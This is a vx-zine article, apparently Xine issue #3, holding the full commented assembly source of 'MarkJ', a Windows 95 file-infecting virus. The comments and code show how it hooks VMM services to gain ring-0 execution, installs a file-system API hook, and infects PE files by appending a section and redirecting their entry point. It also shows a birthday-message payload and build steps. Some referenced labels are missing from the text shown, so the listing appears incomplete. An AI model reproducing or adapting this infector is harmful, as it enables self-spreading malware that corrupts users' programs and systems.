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Xine - issue #3 - Phile 200

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 · 4 May 2024

| Xine - issue #3 - Phile 200 |

; MarkJ, by Murkry/IkX
; Well this idea was very klunky (;) hi dv8) until I received and
; dissassembled the F---- harry 3 virus. There I found that you could hook
; VxD functions (yay) using the QG manuver. Well this made this virus easier,
; the main difference between QG's are this is larger and requires a section
; to be added the host; this is due to the method in how it gets tsr space its
; section header is set to Virtual address c0000000 - 400000 (bfc00000)
; which makes this section loaded at C0000000 an "unused" area in sharedVxD
; memory this method will also work with the shared memory at 70000000 this
; method will leave that 1000h area in memory even after the orginal program
; is ended ;))
; (*added now b0z0 has already used this in one of his new viruses I am glad
; to see*)
; As for the QG manuever well see his source code for more info but basically
; he uses a fixed location to find the vmm Device Descriptor Block in memory,
; then finds the schedule Global event entry point well you save this address
; and replace it with a pointer to your code which will then be at the ring0
; VxD land now you can call the ifsmger calls to do similiar to the mrKlunky
; and then repair the Global Event call and your set. Yeah i know thats
; confusing read the code and figure it out you will learn more and feel better
; about yourself :)
; Problems to overcome:
; well VxDcalls are coded in this fashion
; int 20h
; dd 00400032 ; vxd vxdfunction
; which is replaced with
; call [vxdfunction address]
; after the first time it is executed so the code can no longer be simply
; added to the host, QG fixed this by "patching" all these Dynalinks back to
; the int 20.... in Fharry, but he leaves the last one that is called at the
; final write to file which is converted to the call[...] b4 the write to file
; so this leaves one entry that is not patched Well this is sorta easy to fix
; in a number of methods I am choosing the easiest way which is to copy the
; code b4 the dynalink occur to an another location and when I write that copy
; of the code to the new host, another method would be to create the int 20's
; in a dynamic manner the first time this method might be nice for a mutating
; form of this type of virus as you can see VX technology is unlimited in what
; there is to explore in the Win95 enviroment.
; hmm oh yeah the virus has a small payload on the 25th of june it will
; display a VWin32_SysErrorBox wishing Mark j a happy bday :)
; For those who wonder MarkJ is my friend's son, who is the one who show me
; the wonderful world of Virii; JHB yea he is around!
; I know that since I show this to b0z0 he has taken this idea cleaned it up
; added new ideas so for some code that is more robust check out his article's
; Murkry

.Radix 16

;some restrictions
;I do not alter the Virtual address of the new section so the
; host host must load at a base address of a 400000h if this is not true do
; not infect
;to try to stay as a Win95 I check for file alignment as a 200h if not again
;do not infect

; the "new" vxd area I create wants dd 0c0000040h
;for its characerstics or it fails out strange
; now this infects pe files that are name as .com files but get this
; the infect com will not run it hangs the system???? well this is just
;for demo purposes, rename the infected file to *.exe and it will work :)
;and lastly I did not add some check to insure that section directory has
;enough room in it ;) I leave these problems for the student to fix
; unlike most vxd's virii this requires Tasm and a debug script that sets the
; characterisics of the .DATA to 0c0000040h all set ;)
;but does not need special .lib's or the infamous ddk ;)
;while i have access to it I prefer to make my files without such things
;that way I can use Tasm and not Masm
;Well Virii eXplorers I hope this is an acceptable offering ;)
;thanks to QuantumG, DV8 for source and EXE's that help complete this
;Murkry 8/21/97

; Compiling:
; tasm32 /ml /m3 markj,,;
; tlink32 /Tpe /aa /c /v markj,markj,, import32.lib,
; And then just make the DATA area to be loaded at BFC00000h with a hex editor

LoadAt equ 0c0000000h
PeHeader equ offset Buffer - offset markj + LoadAt
.model flat

extrn ExitProcess:PROC
extrn AddAtomA:PROC
;this is just the data area that I am using to build the code that will
;go in the 0c0000000h area the start of the host will be in the .code
; and in a real infection it will execute from the section dir..
.data ;the data area

;first thing find the VMM uses a fixed location here
;yea this is just a modfied form of fuck harry by QG but
;why not
;maybe its possible to just scan for 'VMM '
;From 0C0010000 ?

;ok first thing copy the virus to the end of our work and data error
;this way we have an ucorrupted version
mov esi, LoadAt
mov edi,offset DummyCode - Offset StartOfVirus + LoadAt
mov Ecx,offset EndVirus - Offset StartOfVirus
rep movsb

mov eax,0C000157Fh ;pointer to one location???
mov ebx,[eax] ;of the VMM dbb
cmp dword ptr [ebx+0C],0204D4D56h ;'VMM '
jne ErrorExit ;if not here get out

mov ebx,[ebx+30h]
;find the Service table for th vmm
;now load the call_global_event address (I think)
;I have read the source to Fharry and I was right :)
;Sorta hook this Services
lea eax,[ebx+3Ch]

;Store this value to restore it later
mov dword ptr ds:[0c0000000h + offset OrgIfsEntry- Offset markj],eax
; 0c000e384h

mov eax,[eax]

mov dword ptr ds:[offset VxDOff - Offset markj + LoadAt ],eax
; 402066
lea eax,dword ptr ds:[ offset NewHandler - Offset markj + LoadAt]
;hook the code
mov [ebx+3Ch],eax ;New Location of our Handler

;Ok we should be set to return to the host


inc byte ptr ds:[offset CheckTsr - offset markj + LoadAt]


;In Dos we would now be in the int Handler
; Here we are now in Ring 0 and are part of the VxD land ;)
; this is where we finish the QG manuever by hooking HookFSD


;restore the global event hook
mov eax,dword ptr ds:[VxDOff - offset markj + LoadAt]

;mov [00000000],eax
db 0A3h
OrgIfsEntry dd 0

mov word ptr ds:[offset VxDSeg - Offset markj + LoadAt],cs
call CallIFSHook


; jmp 0028:00000000
db 0eah
VxDOff dd 0401000h
VxDSeg: dw 0137h


lea eax,dword ptr ds:[offset NewFShook - Offset markj + LoadAt]
push edx
push eax

;this is sorta like hooking every int21 that handle file access in DOS
;This will add a FS hook now whenever a FSD is Called this will be called
;Tos = New Fsd Address to Install
;EAX = Last FShook
ApiHook: ;4020dd
int 20h
APIHOOKVXD dd 00400067h
; IFSMgr_Device_ID 0x00040 /* Installable File System Manager */
; IFSMgr_Service IFSMgr_InstallFileSystemApiHook 67

add esp,00000004 ;like a pop changes no regs but esp
;some VxD's routines
;do not clean up after themselves
;Sometimes check docs for specs :))

pop edx ; restore Edx
;Save the old FSHook so we can chain to it
mov dword ptr ds:[ offset OldFSD - Offset markj + LoadAt],eax

;A little payload here if its the 6/25 then display the B-day mess
;just using the VMM Exec_VxD_Int to get the System date
;To be honest I could not find an easier way to do this!!!
;there are some VxD that give time and date but the date is how many
; seconds(I think) from some date in the 1980's this is easier and
; shows that accessing int 21 is still possible infact if QG is hooking the
; the GlobalEvent from the VMM it should be possible to hook the int21
; hanlder in a similiar fashion then some creative coding could make the
; Dos tsr and the VxD code very similiar....
; check for 6/25 if its the date show the message and set the flag

mov eax,00002A00h ;get system date
push dword ptr 21h
int 20h
V2 dd 0001008fh

cmp dx,0619
;6/25 in hex for those decimal heads ;)
jne ForGetIt

;this shows how one might use the VWin32_SysErrorBox
;To display a little message justing saying Hi to JHB's son who is the
; happy (?) reason jhb is not coding as much any more I should add he
;did help with alot of this code
mov ebx, LoadAt
add ebx, offset EBox - offset markj
int 20h
V3 dd 002a001ah


;all right we have "legal" hook into a FSD and the rest is the
;just the infection routine
push ebp
mov ebp,esp
sub esp,00000020

;Relative EBP this is what was passed I hope DV8 does not mind me
; using his docs to define this stuff
;00 - ebp
;04 - address of caller
;08 - adress of FSD Function
;0c - Function ID
;10 - drive
;14 - Type of Resource
;18 - Code Page
;1C - Pointer to IOREQ record
; 00 dw Lenght if user Buffer
; 02 db status Flag
; 03 db requests' user Id
; 04 dw file handle's System File number
; 06 dw Process ID
; there is more I will copy or add as needed

push ebx
push esi
push edi

; mov edi,00000000
; db 0bfh ;this gets us so edi points to our
;VirriOffVxD dd LoadAt ;loc in memory

; Use this flag so we are not reentrant

cmp byte ptr ds:[offset Flag1 - offset markj + LoadAt],01
je letOrginal
;Win95 always opens the file b4 running it so this checks and lets us
;check if it is opened
cmp dword ptr [ebp+0Ch],00000024h
jne letOrginal

;ok set our flag
mov byte ptr ds:[offset Flag1 - offset markj + LoadAt],01

lea esi,byte ptr ds:[offset FileName - offset markj + LoadAt]

mov eax,[ebp+10h] ;Primary Data buffer of the IOREQ
cmp al,0FFh
je NoNeedDriveLetter

add al,40h ;this creates the c:
mov [esi],al ;
inc esi ;takes 1 byte
mov byte ptr [esi],':' ;
inc esi ;takes two bytes


xor eax,eax
push eax ;character set

mov eax,000000FF ;max size of output buffer
push eax ;

mov ebx,[ebp+1Ch] ;??? copies from Mr k and
mov eax,[ebx+0Ch] ;Fharry virus it seems to
add eax,00000004 ;to get the input file name
push eax ; which is in unicode

mov eax,esi ;where we want the output
push eax ;

UniToBcs: ;ok do it
int 20h
dd 00400041h
;IFSMgr_Service UniToBCSPath
add esp, 4*4 ;need to clean up the stack
; dword size * how many push
add esi,eax
mov byte ptr [esi],00
cmp dword ptr [esi - 4],"MOC."
; cmp dword ptr [esi - 4],"EXE." ;hmm could just put this in to infect
;proper files ;>
jne ExitVVxD
;could add the get and save attributes stuff here as a Xercise for the student

mov Eax,0000D500h ;create/open file
xor ecx,ecx
lea Esi,byte ptr ds:[offset FileName - offset markj + LoadAt]
mov ebx,2 ;flags
mov edx,1

call VxDIFS ;decide to combine this call
;int 20
;dd 00400032h
;IFSMgr_Service IFSMgr_Ring0_FileIO

jb ExitVVxD ;error opening the file
mov ebx,eax ;file handle

;Read File open with read write d6
;3c is the location of the dword pter to the PE/NE part

mov ecx,00000004 ;how much
mov edx, 03Ch ;where to read from
mov eax,0000D600h ;read from file
lea esi,byte ptr ds:[offset PEPtr - offset markj + LoadAt]
;where to read to

call VxDIFS
;int 20h
;dd 00400032h
;IFSMgr_Service IFSMgr_Ring0_FileIO

mov ecx,400h
mov edx,dword ptr ds:[offset PEPtr - offset markj + LoadAt]
;use as a pointer
mov eax,0000D600h
lea esi,byte ptr ds:[offset Buffer - offset markj + LoadAt]
;where to read to

call VxDIFS
;int 20h
;dd 00400032h
;IFSMgr_Service IFSMgr_Ring0_FileIO 32
;check for the PE
;Read in the first 1k of info from the PE header on
cmp dword ptr [esi],00004550h ;00,'EP'
jne CloseFile

;Alright!! its a PE file now check if infected
;use the user defined 2 words at 44h = Murk
;figure file size
;figure amout to add
;fix header and write end and then write header
;all offsets should be off the offset Buffer - offset markj + LoadAt
; called PeHeader

;Lets do some checks if any fail get out

cmp dword ptr ds:[PeHeader + 44],'kruM' ;user define
je CloseFile
;Well not infected with MarkJ1 virus

cmp dword ptr ds:[PeHeader + 34h ],00400000h ;base image
jne CloseFile
;for this example we only want the base image to be 400000h

cmp dword ptr ds:[PeHeader + 3ch],200h ;file alignment
jne CloseFile
;and lastly check the file alignment if 200 we are set

xor eax,eax
mov ax,word ptr ds:[PeHeader + 6] ;how many sections
mov ecx,28h ;section size
mul ecx

mov edi,eax ;New Section Entry
add edi,PeHeader + 0f8h ;add Pe header size

push edi ;location in PeHeader of new section header

mov esi, offset SectName - offset markj + LoadAt
mov ecx, offset EndVirus - offset SectName
rep movsb

pop edi

;get file size
mov eax,0d800h ;get file size

call VxDIFS
; int 20h
; dd 00400032h
;IFSMgr_Service IFSMgr_Ring0_FileIO
;jc for error

mov dword ptr ds:[offset FileSize - offset markj + LoadAt],Eax

push eax ;save the size
pop edx ;get it in edx
push edx ;save again
add eax,0200h
shr eax,09h ;make it the 200h size
shl eax,09h ;

pop ecx
sub eax,ecx
xchg eax,ecx

;Extend the file to a 200 file alignment

cmp ecx,0200h
jz AtAlignment
add dword ptr ds:[offset FileSize - offset markj + LoadAt],Ecx

mov eax,0000d601h ;write to file
mov esi,0c0000000h
call VxDIFS
;int 20h
;dd 00400032h ;edx is telling us where to write to in the file

mov edx, dword ptr ds:[offset FileSize - offset markj + LoadAt]
mov dword ptr ds:[edi + 14h ],edx

mov ecx,offset EndVirus - offset StartOfVirus
mov eax,0000d601h ;write to file
mov esi,offset DummyCode - Offset StartOfVirus + LoadAt
call VxDIFS
;int 20h
;dd 00400032h ;edx is telling us where to write to

;ok fix the header and write it back
;fix marker
mov dword ptr ds:[PeHeader + 44h],'kruM' ;user define
;fix Eip
mov eax,edi
sub eax,PeHeader
add eax,dword ptr ds:[offset PEPtr - offset markj + LoadAt]
add eax,28h ;<----NewEip
mov dword ptr ds:[edi + 28h + 1],eax
push eax ;save the new eip

mov eax,dword ptr ds:[PeHeader + 28]
mov dword ptr ds:[edi + offset OldEipRva - offset SectName],eax

pop eax
mov dword ptr ds:[PeHeader + 28],eax ;set the new eip

;fix section count
inc word ptr ds:[PeHeader + 6]

mov ecx,400h
mov edx,dword ptr ds:[offset PEPtr - offset markj + LoadAt]
;use as a pointer
lea esi,byte ptr ds:[offset Buffer - offset markj + LoadAt]
;where to read to
mov eax,0000d601h ;write to file
call VxDIFS
; int 20h
; dd 00400032h ;edx is telling us where to write to

mov eax,0000d700h

call VxDIFS
;int 20h ;402500h
;dd 00400032h
;IFSMgr_Service IFSMgr_Ring0_FileIO

;Restore our flag so we can infect the next file
mov byte ptr ds:[offset Flag1 - offset markj + LoadAt],0


mov eax,[ebp+1CH] ;040250eh
push eax
mov eax,[ebp+18H]
push eax
mov eax,[ebp+14H]
push eax
mov eax,[ebp+10H]
push eax
mov eax,[ebp+0CH]
push eax
mov eax,[ebp+08H]
push eax

;mov eax,00000000
db 0b8h
OldFSD dd 0
call [eax]

add esp,00000018
pop edi
pop esi
pop ebx
leave ;402533h

int 20h ;402500h
dd 00400032h


MFlag db ?
Flag1 db ?

EBox dd ?
butt1 dw 0
butt2 dw 8001
butt3 dw 0
TitleOff dd offset TitleEB - offset markj +0c0000000h
TextOff dd offset TextEB - offset markj +0c0000000h

TitleEB db 'Happy Birth Day to Mark J ',0
TextEB db 'From Murkry',0


SectName db "MarkJ_I "
Physadd dd offset EndVirus - offset StartOfVirus
VirtualAdd dd 0c0000000h - 400000h ;bfc00000
SizeRawData dd offset EndVirus - offset StartOfVirus
PntrRawData dd 0 ;will be set at infection
PnterReloc dd ?
PnterLine dd ?
dw ?
dw ?
Character dd 0c0000040h

;sub eax, offset HOST - 400000h
db 2dh
NewEipRva dd offset HOST - 400000h

cmp eax,400000h
jne GetOut
cmp byte ptr ds:[offset CheckTsr - offset markj + LoadAt],0
jne GetOut

;EAX ;current base address
call DoNothing
pop eax
add eax,0bh
push eax
push 0c0000000h


;add eax, offset return - 400000h
db 05h
OldEipRva dd offset return - 400000h

jmp eax

FileName db 100 dup(00) ;holds the file name

PEPtr dd 0
FileSize dd 0
Buffer db 400h dup(00)

CheckTsr db 00


.code ;executable code starts here

;sub eax, offset HOST - 400000h
db 2dh
NewEipRva1 dd offset HOST - 400000h

cmp eax,400000h
jne GetOut1
cmp byte ptr ds:[offset CheckTsr - offset markj + LoadAt],0
jne GetOut1

;EAX ;current base address
call DoNothing1
pop eax
add eax,0bh
push eax
push 0c0000000h


;add eax, offset return - 400000h
db 05h
OldEipRva1 dd offset return - 400000h

jmp eax

push LARGE -1
call ExitProcess

end HOST

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